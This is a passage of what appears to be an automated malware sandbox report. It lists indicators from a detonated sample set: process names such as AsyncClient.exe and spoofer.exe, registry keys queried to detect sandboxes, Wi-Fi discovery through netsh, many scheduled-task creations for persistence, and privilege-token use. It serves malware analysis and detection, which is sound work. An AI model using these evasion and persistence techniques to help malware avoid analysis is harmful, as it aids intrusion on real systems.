\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svc2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svc2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TORRENTOLD-1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TORRENTOLD-1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallSetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Solara_Protect.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AsyncClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language yoda.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language prueba.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ImageEditorforWP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ScreenSync.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svc1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Plenty.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language din.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 22 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 6584 PING.EXE 1080 PING.EXE 5240 PING.EXE 5988 PING.EXE 7900 PING.EXE 4920 PING.EXE 5280 PING.EXE 8084 PING.EXE 648 PING.EXE 5728 PING.EXE 7032 PING.EXE 5776 PING.EXE 7096 reg.exe 4112 PING.EXE 5732 PING.EXE 6756 PING.EXE 5444 PING.EXE 6844 PING.EXE 6512 PING.EXE 4808 PING.EXE 7000 PING.EXE 6552 PING.EXE -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 6640 cmd.exe 5960 netsh.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI svc1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI svc1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI svc1.exe -
Checks processor information in registry 2 TTPs 16 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz procexp64.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 procexp64.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz procexp64.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 procexp64.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 3632 timeout.exe 6460 timeout.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 6512 WMIC.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 3144 ipconfig.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 2844 systeminfo.exe -
Kills process with taskkill 3 IoCs
pid Process 7268 taskkill.exe 5676 taskkill.exe 7172 taskkill.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 020000000100000000000000ffffffff Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\1\NodeSlot = "14" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\1 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Explorer.EXE Key deleted \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache spoofer.exe Key created \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202020202 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\1\MRUListEx = ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202020202020202 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616209" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\NodeSlot = "15" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\SniffedFolderType = "Generic" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\SniffedFolderType = "Generic" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\NodeSlot = "13" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202020202020202 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\1 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\SniffedFolderType = "Generic" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616209" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\2 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\MRUListEx = 020000000000000001000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} Explorer.EXE -
NTFS ADS 1 IoCs
description ioc Process File created C:\Users\Admin\Downloads\SysinternalsSuite.zip:Zone.Identifier firefox.exe -
Runs ping.exe 1 TTPs 21 IoCs
pid Process 5776 PING.EXE 5240 PING.EXE 5732 PING.EXE 8084 PING.EXE 6756 PING.EXE 4808 PING.EXE 5728 PING.EXE 7032 PING.EXE 7900 PING.EXE 6552 PING.EXE 5988 PING.EXE 6844 PING.EXE 648 PING.EXE 5280 PING.EXE 5444 PING.EXE 6512 PING.EXE 1080 PING.EXE 7000 PING.EXE 4112 PING.EXE 4920 PING.EXE 6584 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 52 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6124 schtasks.exe 7212 schtasks.exe 6012 schtasks.exe 5636 schtasks.exe 920 schtasks.exe 3400 schtasks.exe 5512 schtasks.exe 7000 schtasks.exe 5476 schtasks.exe 6564 schtasks.exe 5432 schtasks.exe 4496 schtasks.exe 6752 schtasks.exe 6564 schtasks.exe 4272 schtasks.exe 6508 schtasks.exe 6400 schtasks.exe 6780 schtasks.exe 1548 schtasks.exe 6576 schtasks.exe 5968 schtasks.exe 10988 schtasks.exe 8800 schtasks.exe 2084 schtasks.exe 6248 schtasks.exe 5648 schtasks.exe 7052 schtasks.exe 7100 schtasks.exe 10108 schtasks.exe 3540 schtasks.exe 8420 schtasks.exe 6896 schtasks.exe 2524 schtasks.exe 2492 schtasks.exe 8460 schtasks.exe 9532 schtasks.exe 5256 schtasks.exe 6808 schtasks.exe 7020 schtasks.exe 10664 schtasks.exe 5744 schtasks.exe 2540 schtasks.exe 3632 schtasks.exe 3684 schtasks.exe 6684 schtasks.exe 6580 schtasks.exe 6076 schtasks.exe 6208 schtasks.exe 6084 schtasks.exe 5948 schtasks.exe 5300 schtasks.exe 5032 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 1892 msedge.exe 1892 msedge.exe 3884 msedge.exe 3884 msedge.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3532 Explorer.EXE -
Suspicious behavior: LoadsDriver 3 IoCs
pid Process 2752 procexp64.exe 4016 vbc.exe 1736 procexp64.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 6572 suwce.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
pid Process 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2336 firefox.exe Token: SeDebugPrivilege 2336 firefox.exe Token: SeDebugPrivilege 2336 firefox.exe Token: SeDebugPrivilege 2752 procexp64.exe Token: SeBackupPrivilege 2752 procexp64.exe Token: SeSecurityPrivilege 2752 procexp64.exe Token: SeLoadDriverPrivilege 2752 procexp64.exe Token: SeShutdownPrivilege 2752 procexp64.exe Token: SeCreatePagefilePrivilege 2752 procexp64.exe Token: SeShutdownPrivilege 2752 procexp64.exe Token: SeCreatePagefilePrivilege 2752 procexp64.exe Token: SeDebugPrivilege 2752 procexp64.exe Token: SeImpersonatePrivilege 2752 procexp64.exe Token: SeSecurityPrivilege 2752 procexp64.exe Token: SeDebugPrivilege 2752 procexp64.exe Token: SeBackupPrivilege 2752 procexp64.exe Token: SeRestorePrivilege 2752 procexp64.exe Token: SeDebugPrivilege 2752 procexp64.exe Token: SeDebugPrivilege 4720 4363463463464363463463463.exe Token: SeDebugPrivilege 3504 New Text Document mod.exe Token: SeDebugPrivilege 1980 seksiak.exe Token: SeShutdownPrivilege 3532 Explorer.EXE Token: SeCreatePagefilePrivilege 3532 Explorer.EXE Token: SeShutdownPrivilege 3532 Explorer.EXE Token: SeCreatePagefilePrivilege 3532 Explorer.EXE Token: SeShutdownPrivilege 3532 Explorer.EXE Token: SeCreatePagefilePrivilege 3532 Explorer.EXE Token: SeShutdownPrivilege 3532 Explorer.EXE Token: SeCreatePagefilePrivilege 3532 Explorer.EXE Token: SeShutdownPrivilege 3532 Explorer.EXE Token: SeCreatePagefilePrivilege 3532 Explorer.EXE Token: SeShutdownPrivilege 3532 Explorer.EXE Token: SeCreatePagefilePrivilege 3532 Explorer.EXE Token: SeShutdownPrivilege 3532 Explorer.EXE Token: SeCreatePagefilePrivilege 3532 Explorer.EXE Token: SeShutdownPrivilege 3532 Explorer.EXE Token: SeCreatePagefilePrivilege 3532 Explorer.EXE Token: SeShutdownPrivilege 3532 Explorer.EXE Token: SeCreatePagefilePrivilege 3532 Explorer.EXE Token: SeShutdownPrivilege 3532 Explorer.EXE Token: SeCreatePagefilePrivilege 3532 Explorer.EXE Token: SeShutdownPrivilege 3532 Explorer.EXE Token: SeCreatePagefilePrivilege 3532 Explorer.EXE Token: SeShutdownPrivilege 3532 Explorer.EXE Token: SeCreatePagefilePrivilege 3532 Explorer.EXE Token: SeShutdownPrivilege 3532 Explorer.EXE Token: SeCreatePagefilePrivilege 3532 Explorer.EXE Token: SeShutdownPrivilege 3532 Explorer.EXE Token: SeCreatePagefilePrivilege 3532 Explorer.EXE Token: SeShutdownPrivilege 3532 Explorer.EXE Token: SeCreatePagefilePrivilege 3532 Explorer.EXE Token: SeShutdownPrivilege 3532 Explorer.EXE Token: SeCreatePagefilePrivilege 3532 Explorer.EXE Token: SeShutdownPrivilege 3532 Explorer.EXE Token: SeCreatePagefilePrivilege 3532 Explorer.EXE Token: SeShutdownPrivilege 3532 Explorer.EXE Token: SeCreatePagefilePrivilege 3532 